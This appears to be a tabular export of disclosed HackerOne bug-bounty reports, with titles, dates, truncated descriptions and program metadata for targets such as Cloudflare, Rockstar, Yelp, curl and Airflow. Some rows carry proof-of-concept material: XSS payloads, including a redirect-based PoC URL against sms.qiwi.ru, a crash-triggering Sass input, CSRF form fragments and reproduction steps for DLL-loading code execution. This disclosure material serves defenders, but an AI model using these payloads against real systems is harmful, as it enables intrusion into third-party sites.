## Impact
null | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/variants/bjo7gvfo868dynx0tje59p27ydpf/d3dc6b2d7e2dc3657e8861b0d7e2dfca1a6d513dd... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "h1-ctf",
"id": 46757,
"offers_bounties": false,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "Let's save the holidays together! #Togethe... | false | full | 2020-06-18T01:04:08.535Z | null | null | 64 | {
"asset_identifier": "*.bountypay.h1ctf.com",
"asset_type": "WILDCARD",
"databaseId": 48138,
"max_severity": "none"
} |
1,728,292 | Cloudflare is not properly deleting user's account | 2022-10-10T12:12:07.214Z | resolved | {
"cleared": true,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/mlrhp2f8xo23h8qrwhp38hsai4gr/d3dc6b2d7e2dc3657e8861b0d7e2dfca1a6d513dd784c613f4e56738907cea98"
},... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "cloudflare",
"id": 41,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "Help us build a better Internet",
"nam... | true | no-content | 2023-04-13T11:49:34.588Z | {
"id": 65,
"name": "Business Logic Errors"
} | null | 15 | {
"asset_identifier": "dash.cloudflare.com",
"asset_type": "URL",
"databaseId": 92116,
"max_severity": "critical"
} | |
482,818 | CSRF на лайк к отзыву (Pandao) | 2019-01-20T09:32:17.101Z | resolved | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/ccy7tx9n4z5xw6hd4ko6ze3f3mva/3c7b305354c9073c106ae3d1701798defaaf5be844fb8fdfa49ca62f991a2c2c"
}... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "mailru",
"id": 65,
"offers_bounties": false,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "Building the Internet since 1998",
"name"... | false | no-content | 2019-03-11T13:06:32.907Z | {
"id": 45,
"name": "Cross-Site Request Forgery (CSRF)"
} | null | 13 | {
"asset_identifier": "*.pandao.ru",
"asset_type": "URL",
"databaseId": 21384,
"max_severity": "critical"
} | |
221,289 | heap-use-after-free in Sass::SharedPtr::incRefCount() | 2017-04-15T20:31:06.780Z | resolved | Feeding `@P#{()if(0,0<0,0)}` to `./sassc -s` triggers this use after free.
```
==10210==ERROR: AddressSanitizer: heap-use-after-free on address 0x60c00000a908 at pc 0x000000610a0f bp 0x7fff12af40d0 sp 0x7fff12af40c8
READ of size 8 at 0x60c00000a908 thread T0
#0 0x610a0e in Sass::SharedPtr::incRefCount() /home/geek... | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/7xfGZCKCxUuGLYGfuUZM3XyY/d3dc6b2d7e2dc3657e8861b0d7e2dfca1a6d513dd784c613f4e56738907cea98"
},
... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "libsass",
"id": 2250,
"offers_bounties": false,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "LibSass is a C/C++ port of the Sass engine... | false | full | 2017-08-10T21:38:35.540Z | {
"id": 50,
"name": "Use After Free"
} | null | 4 | null |
1,208,453 | Account takeover through multistage CSRF at https://autochoice.fas.gsa.gov/AutoChoice/changeQAOktaAnswer and ../AutoChoice/changePwOktaAnswer | 2021-05-25T12:08:45.244Z | resolved | Hi,
Account takeover is possible through CSRF vulnerability at 'Change Security Question/Answer' & ' Change Password'.
The endpoints - https://autochoice.fas.gsa.gov/AutoChoice/changeQAOktaAnswer & https://autochoice.fas.gsa.gov/AutoChoice/changePwOktaAnswer both are vulnerable to CSRF attack .==The CSRF token/or its... | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/HSnGP4ZA9NoaVBJ9pAHjSPSQ/3c7b305354c9073c106ae3d1701798defaaf5be844fb8fdfa49ca62f991a2c2c"
},
... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "gsa_vdp",
"id": 50553,
"offers_bounties": false,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "",
"name": "U.S. General Services Adm... | false | full | 2021-07-23T02:07:47.706Z | {
"id": 45,
"name": "Cross-Site Request Forgery (CSRF)"
} | null | 30 | {
"asset_identifier": "autochoice.fas.gsa.gov",
"asset_type": "URL",
"databaseId": 60003,
"max_severity": "critical"
} |
2,065,306 | odbc apache airflow provider code execution vulnerability | 2023-07-12T11:23:41.417Z | resolved | In airflow.providers.odbc.hooks.odbc.OdbcHook, A privilege escalation vulnerability exists in a system due to controllable ODBC driver parameters that allow the loading of arbitrary dynamic-link libraries, resulting in command execution.
Vulnerability reproduction steps:
1. get a malicious dynamic-link library drive... | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/ge9nqc4uzovevjhsukseo1h76fhy/3c7b305354c9073c106ae3d1701798defaaf5be844fb8fdfa49ca62f991a2c2c"
}... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "ibb",
"id": 54349,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "The Internet Bug Bounty rewards security resea... | true | full | 2023-08-26T11:40:39.371Z | {
"id": 75,
"name": "Privilege Escalation"
} | null | 9 | {
"asset_identifier": "https://github.com/apache/airflow",
"asset_type": "SOURCE_CODE",
"databaseId": 86381,
"max_severity": "critical"
} |
491,654 | Image Injection vulnerability affecting www.rockstargames.com/careers may lead to Facebook OAuth Theft | 2019-02-06T00:29:54.327Z | resolved | {
"cleared": true,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/variants/6vkmtgv1zjedvx3ssnhkcgoy22fm/d3dc6b2d7e2dc3657e8861b0d7e2dfca1a6d513dd7... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "rockstargames",
"id": 2143,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "Publishers of such popular games as G... | true | no-content | 2020-06-24T17:18:28.292Z | {
"id": 18,
"name": "Information Disclosure"
} | null | 5 | {
"asset_identifier": "www.rockstargames.com",
"asset_type": "URL",
"databaseId": 429,
"max_severity": "critical"
} | |
288,353 | SMB SSRF in emblem editor exposes taketwo domain credentials, may lead to RCE | 2017-11-08T12:03:34.372Z | resolved | {
"cleared": true,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/c8iyhelw8y0ttcuqvcjjg48epadx/d3dc6b2d7e2dc3657e8861b0d7e2dfca1a6d513dd784c613f4e56738907cea98"
},... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "rockstargames",
"id": 2143,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "Publishers of such popular games as G... | true | no-content | 2018-01-12T15:55:48.377Z | {
"id": 68,
"name": "Server-Side Request Forgery (SSRF)"
} | null | 46 | {
"asset_identifier": "socialclub.rockstargames.com",
"asset_type": "URL",
"databaseId": 430,
"max_severity": "critical"
} | |
1,489,141 | ReDoS in Rack::Multipart | 2022-02-22T22:34:07.597Z | resolved | Hello, I found ReDoS on Rack.
I found this problem using `recheck` (https://makenowjust-labs.github.io/recheck/), a ReDoS detection tool.
This tool has found multiple places where there seems to be a problem with the rack code, but since there are many and it takes time to check the behavior, I will first report on `... | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/000/012/811/4b35334fa2fcf93b2e510174e09470fb42bbf03a_original.gif/9a55e00ecd2cdf18a7f40678e6836e4c... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "rails",
"id": 22,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "Web development that doesn't hurt.",
"name"... | false | full | 2023-07-28T00:26:27.997Z | null | null | 17 | {
"asset_identifier": "https://github.com/rails/rails",
"asset_type": "SOURCE_CODE",
"databaseId": 160,
"max_severity": "critical"
} |
118,950 | Stored XSS | 2016-02-26T14:05:13.563Z | resolved | Hello,
I have found XSS on https://sandbox.veris.in/portal/members/
Steps to reproduce:
1. Sign in your Veris account.
2. Go to Member Book -> Add new member.
3. Fill this payload <svg onload=alert(1)> in "Name" and "Description" field.
4. Now visit https://sandbox.veris.in/portal/members/ or go to groups->Add me... | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/000/017/083/1c184e3b6a29f0b62478ca965b448f9da3d27a1b_original.jpg/3c7b305354c9073c106ae3d1701798de... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "veris",
"id": 9409,
"offers_bounties": false,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "",
"name": "Veris",
"twitter_handle"... | false | full | 2016-06-12T16:05:39.961Z | {
"id": 60,
"name": "Cross-site Scripting (XSS) - Generic"
} | null | 1 | null |
184,901 | Stored cross site scripting (XSS) vulnerability on a DoD website | 2016-11-24T16:31:12.309Z | resolved | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/000/048/674/a85d1f36a4d4b4c6269951bc913cc6f4fc3fcb23_original.JPG/cccd3716a6d2e06174d2a41492445cb1... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "deptofdefense",
"id": 16064,
"offers_bounties": false,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "",
"name": "U.S. Dept Of Defens... | false | no-content | 2017-06-23T14:57:29.853Z | {
"id": 60,
"name": "Cross-site Scripting (XSS) - Generic"
} | null | 4 | null | |
824,909 | Subdomain Takeover uptime | 2020-03-19T21:29:44.357Z | resolved | Hello Team:
i can't report it to the company so i hope to accept it as a valid bug , i found subdomain takeover in your subdomain ```uptime.btfs.io``` , i found this subdomain pointed to uptimerobot and not claimed so i signedup in uptimerobot and claimed it.
POC:
------
1 - open https://uptime.btfs.io/
2 - you need... | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/variants/ks0roh96sguxe7eqbk2111otneg6/ede8cd84a64d5392a2bb88ecb598721116469c27c... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "btfs",
"id": 45735,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "",
"name": "BTFS",
"twitter_handle": ... | true | full | 2020-05-05T20:50:32.622Z | {
"id": 75,
"name": "Privilege Escalation"
} | null | 13 | null |
384,472 | Possible to Upload Local Arbitrary Private File to the Cloud against User's Will | 2018-07-20T06:32:13.663Z | resolved | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/Tb1UbdfiVsp4Pd2TU49yQv9A/d3dc6b2d7e2dc3657e8861b0d7e2dfca1a6d513dd784c613f4e56738907cea98"
},
... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "mailru",
"id": 65,
"offers_bounties": false,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "Building the Internet since 1998",
"name"... | true | no-content | 2019-07-06T16:47:05.004Z | {
"id": 18,
"name": "Information Disclosure"
} | null | 8 | {
"asset_identifier": "ru.mail.cloud",
"asset_type": "GOOGLE_PLAY_APP_ID",
"databaseId": 240,
"max_severity": "critical"
} | |
38,345 | [sms.qiwi.ru] XSS via Request-URI | 2014-12-05T18:25:52.848Z | resolved | Сценарий https://sms.qiwi.ru/bo/reset/ выводит Request-URI без необходимых обработок. Эксплуатация возможно в браузере Internet Explorer через баг перенаправления (Request-URI будет послан без urlencode).
PoC (IE)
`http://blackfan.ru/x?r=https://sms.qiwi.ru/bo/reset/"><svg/onload=alert(document.domain)>/%252e%252e... | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/000/002/205/e865d3ffcef54eba49cba80bd59502a347519715_original.jpeg/ede8cd84a64d5392a2bb88ecb598721... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "qiwi",
"id": 215,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "The QIWI brand is a family brand that consolida... | true | full | 2018-11-18T07:19:27.455Z | {
"id": 60,
"name": "Cross-site Scripting (XSS) - Generic"
} | null | 16 | null |
54,094 | HTTP MitM on Flash Player settings manager allows attacker to set sandbox settings | 2015-03-31T20:55:29.703Z | resolved | This vulnerability is present in both Google Chrome's PepperFlash aswell as browsers
with the NPAPI Flash Player versions.
It works by MITM'ing the Flashplayer settings manager.
Although this settings manager is served over HTTPS, it is still
possible to place or edit the local settings cookie by serving it over
... | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/2iouhy8utvcsxgio5i5yo90tqikz/3c7b305354c9073c106ae3d1701798defaaf5be844fb8fdfa49ca62f991a2c2c"
}... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "ibb",
"id": 54349,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "The Internet Bug Bounty rewards security resea... | true | full | 2018-12-23T21:09:32.056Z | null | null | 11 | {
"asset_identifier": "IBB (Legacy)",
"asset_type": "OTHER",
"databaseId": 84122,
"max_severity": "none"
} |
178,831 | CSRF on signup endpoint (auto-api.yelp.com) | 2016-10-29T14:59:58.731Z | resolved | Sign up request on https://auto-api.yelp.com/account/create_secure endpoint processes without any checking headers (without cookies, csrf tokens and even user-agent).
This is sample HTML form:
---
<html>
<head></head>
<body>
<form action="https://auto-api.yelp.com/account/create_secur... | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/000/120/171/30e412075c5d11dc8af7dcea30995ae6b611bd7b_original.png/d3dc6b2d7e2dc3657e8861b0d7e2dfca... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "yelp",
"id": 545,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "Connecting people to great local businesses in ... | true | full | 2017-03-01T17:49:09.936Z | {
"id": 45,
"name": "Cross-Site Request Forgery (CSRF)"
} | null | 12 | null |
159,955 | integer overflow in bzdecompress caused heap corruption | 2016-08-17T07:10:16.230Z | resolved | Please check: https://bugs.php.net/bug.php?id=72837 | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/000/003/621/93eac54c6d663681d5f278d44e2f49570990cf5c_original.jpg/3c7b305354c9073c106ae3d1701798de... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "ibb",
"id": 54349,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "The Internet Bug Bounty rewards security resea... | true | full | 2019-11-12T09:32:46.450Z | {
"id": 2,
"name": "Memory Corruption - Generic"
} | null | 5 | {
"asset_identifier": "PHP",
"asset_type": "OTHER",
"databaseId": 84120,
"max_severity": "none"
} |
245,221 | null pointer dereference and segfault in tile-count-merge | 2017-07-02T00:41:36.403Z | resolved | This crash was triggered with `642f773 ` while fuzzing `tile-count-merge` with AFL on Debian 8 x64.
`./tile-count-merge -o /dev/null test000`
```
ASAN:SIGSEGV
=================================================================
==10201==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000048d0af b... | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/7xfGZCKCxUuGLYGfuUZM3XyY/d3dc6b2d7e2dc3657e8861b0d7e2dfca1a6d513dd784c613f4e56738907cea98"
},
... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "mapbox",
"id": 1366,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "Mapbox is an open source mapping platform, p... | false | full | 2017-07-11T15:36:07.317Z | {
"id": 51,
"name": "NULL Pointer Dereference"
} | null | 4 | null |
36,459 | Missing SPF header on revert.io | 2014-11-17T23:09:18.039Z | resolved | Hi,
I noticed that there is no TXT record containing a SPF header:
#PoC
```
> dig TXT revert.io +short
"google-site-verification=ix6OUwvbN9AJLTcdg3ulWcMibIWGgUy_zWEXrWeRYE4"
```
The [SPF Header](http://de.wikipedia.org/wiki/Sender_Policy_Framework) can be used to prevent phishers from impersonating you/you... | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/000/001/637/e5a294547160a5c885e21dacc358769675c8b0e9_original.png/d3dc6b2d7e2dc3657e8861b0d7e2dfca... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "thisdata",
"id": 557,
"offers_bounties": false,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "ThisData is a cloud security service which... | false | full | 2015-01-18T19:45:22.283Z | {
"id": 57,
"name": "Violation of Secure Design Principles"
} | null | 1 | null |
52,181 | Insecure Direct Object References that allows to read any comment (even if it should be private) | 2015-03-16T11:56:07.679Z | resolved | Dear Vimeo Team,
in combination with my previous bug i discovered that it was possible to read any comment on any video even if the video is private: I did a short POC on the Insecure Direct Object Reference.
If an attacker wants to exploit this issue he has to know the ID of the comment, which looks like the ... | {
"cleared": true,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/ocb2n6ptlw1lh0t55azkm7x46mqk/3c7b305354c9073c106ae3d1701798defaaf5be844fb8fdfa49ca62f991a2c2c"
},... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "vimeo",
"id": 56,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "Make life worth watching",
"name": "Vimeo",... | true | full | 2015-05-04T16:51:07.517Z | {
"id": 27,
"name": "Improper Authentication - Generic"
} | null | 3 | null |
77,319 | Full path disclosure at https://keybase.io/_/api/1.0/invitation_request.json | 2015-07-21T13:27:47.914Z | resolved | When we send a POST-request to https://keybase.io/_/api/1.0/invitation_request.json with multiple __full_name__ parameters, for example:
> email=test@testmail.com&full_name=1&full_name=2
we get an error response, which contains infromation about the server paths and code:
> TypeError: Object 1,2 has no method ... | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/000/032/547/1d8b3feccf1a8281a2285cdbfc482aaf3b046b22_original.jpg/3c7b305354c9073c106ae3d1701798de... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "keybase",
"id": 2809,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "",
"name": "Keybase",
"twitter_hand... | true | full | 2015-09-04T18:16:23.265Z | {
"id": 18,
"name": "Information Disclosure"
} | null | 2 | null |
1,630,668 | CVE-2022-32213 - HTTP Request Smuggling Due to Flawed Parsing of Transfer-Encoding | 2022-07-08T03:42:35.377Z | resolved | Original Report: https://hackerone.com/reports/1524555
## Impact
Depending on the specific web application, HRS can lead to cache poisoning, bypassing of security layers, stealing of credentials and so on. | {
"cleared": true,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/variants/q2hu1zvae85i18uspc1vkbpxwdbq/d3dc6b2d7e2dc3657e8861b0d7e2dfca1a6d513dd7... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "ibb",
"id": 54349,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "The Internet Bug Bounty rewards security resea... | true | full | 2022-07-22T04:02:45.592Z | {
"id": 86,
"name": "HTTP Request Smuggling"
} | null | 11 | {
"asset_identifier": "https://github.com/nodejs/node",
"asset_type": "SOURCE_CODE",
"databaseId": 83651,
"max_severity": "critical"
} |
1,337,351 | BYPASSING COMMENTING ON RESTRICTED AUDIENCE VIDEOS | 2021-09-12T06:31:11.027Z | resolved | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "/assets/avatars/default-25f7248a18bdf9e2dc8310319b148d66cff430fa0fade6c5f25fee1b8d7f27ed.png"
},
"url": "/boynamedboy",
"username": "boynamedboy",
"v... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "tiktok",
"id": 49708,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "",
"name": "TikTok",
"twitter_handl... | true | no-content | 2021-11-18T01:47:07.414Z | {
"id": 26,
"name": "Improper Access Control - Generic"
} | null | 65 | {
"asset_identifier": "*.tiktok.com",
"asset_type": "URL",
"databaseId": 50915,
"max_severity": "critical"
} | |
1,614,332 | CVE-2022-32208: FTP-KRB bad message verification | 2022-06-27T07:11:13.355Z | resolved | When curl does FTP transfers secured by krb5, it handles message verification failures wrongly. This flaw makes it possible for a Man-In-The-Middle attack to go unnoticed and even allows it to inject data to the client.
## Impact
Loss of integrity of FTP-KRB transfers | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "/assets/avatars/default-25f7248a18bdf9e2dc8310319b148d66cff430fa0fade6c5f25fee1b8d7f27ed.png"
},
"url": "/nyymi",
"username": "nyymi",
"verified": fa... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "ibb",
"id": 54349,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "The Internet Bug Bounty rewards security resea... | true | full | 2022-06-27T20:09:48.941Z | {
"id": 65,
"name": "Business Logic Errors"
} | null | 7 | {
"asset_identifier": "https://github.com/curl/curl",
"asset_type": "SOURCE_CODE",
"databaseId": 80985,
"max_severity": "critical"
} |
83,667 | apps.owncloud.com: Session Cookie in URL can be captured by hackers | 2015-08-20T14:42:06.693Z | resolved | Session Cookie in URL
URL: https://apps.owncloud.com/stories/feed+rss
Issue detail
The URL in the request appears to contain a PHP Session token within the query string:
https://apps.owncloud.com/stories/feed+rss?id=42590&PHPSESSID=ee0624300266683a4625aabea344212a
Issue background
Sensitive informatio... | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/000/003/791/220e701eb9be549162dfdb1da9b1a1b72ee2dd08_original.png/d3dc6b2d7e2dc3657e8861b0d7e2dfca... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "owncloud",
"id": 3059,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "ownCloud GmbH is the company behind the ow... | false | full | 2015-10-31T11:38:18.102Z | {
"id": 27,
"name": "Improper Authentication - Generic"
} | null | 2 | null |
2,039,870 | CVE-2023-32001: fopen race condition | 2023-06-27T07:05:59.747Z | resolved | As we can see in the following curl code (line 59-61 https://github.com/curl/curl/blob/fb802b521af997230b65174a559f5c419520e142/lib/fopen.c ):
```C
if(stat(filename, &sb) == -1 || !S_ISREG(sb.st_mode)) {
/* a non-regular file, fallback to direct fopen() */
*fh = fopen(filename, FOPEN_WRITETEXT);
...
}
...
``... | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/68gqya4e30aqvzh8b8hd08wrb0y4/3c7b305354c9073c106ae3d1701798defaaf5be844fb8fdfa49ca62f991a2c2c"
}... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "curl",
"id": 35663,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "cURL is an Open Source project providing a li... | false | full | 2023-07-25T05:00:08.873Z | {
"id": 105,
"name": "Time-of-check Time-of-use (TOCTOU) Race Condition"
} | null | 26 | null |
214,576 | SIGABRT - mirb - Double Free | 2017-03-18T23:26:46.437Z | resolved | PoC
-------------------
Attached as test.rb
Debug - mirb
-------------------
x@x:~/Desktop/test/mruby/bin$ gdb -q ./mirb
r Reading symbols from ./mirb...done.
(gdb) r test.rb
Starting program: /home/x/Desktop/test/mruby/bin/mirb test.rb
mirb - Embeddable Interactive Ruby Shell
NoMethodError: undefined method... | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "/assets/avatars/default-25f7248a18bdf9e2dc8310319b148d66cff430fa0fade6c5f25fee1b8d7f27ed.png"
},
"url": "/ston3",
"username": "ston3",
"verified": fa... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "shopify-scripts",
"id": 15668,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "",
"name": "shopify-scripts",
... | true | full | 2017-05-13T21:31:12.187Z | {
"id": 49,
"name": "Double Free"
} | null | 5 | null |
906,790 | Account Takeover on unverified emails in File Sync & Share | 2020-06-24T11:47:00.171Z | resolved | ## Summary
The name change functionality in File Sync & Share is expected to change the name in File Sync & Share. But the API endpoint used in it also allows changing email to any email without having to verify the email. The login email stays the same but the email within File Sync & Share application changes to the ... | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/variants/4um1gc3qqb0oavthynukysvj95hu/3c7b305354c9073c106ae3d1701798defaaf5be84... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "acronis",
"id": 13428,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "Acronis sets the standard for cyber protec... | true | full | 2021-06-16T18:26:18.227Z | {
"id": 57,
"name": "Violation of Secure Design Principles"
} | null | 17 | {
"asset_identifier": "beta-cloud.acronis.com",
"asset_type": "URL",
"databaseId": 13849,
"max_severity": "critical"
} |
772,039 | Same site Scripting | 2020-01-11T03:52:50.245Z | resolved | Same site scripting
I have found an error of some misconfigured DNS in a subdomain of yours which causes same site scripting.
PoC
1 Open a terminal and type ping localhost.drive2.ru
You would see that it resolves back to 127.0.0.1
A screenshot has been attached
## Impact
This may cause security issues in multiple u... | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "/assets/avatars/default-25f7248a18bdf9e2dc8310319b148d66cff430fa0fade6c5f25fee1b8d7f27ed.png"
},
"url": "/dre4dpir4terob3rts",
"username": "dre4dpir4te... | {
"awards_miles": false,
"default_currency": "usd",
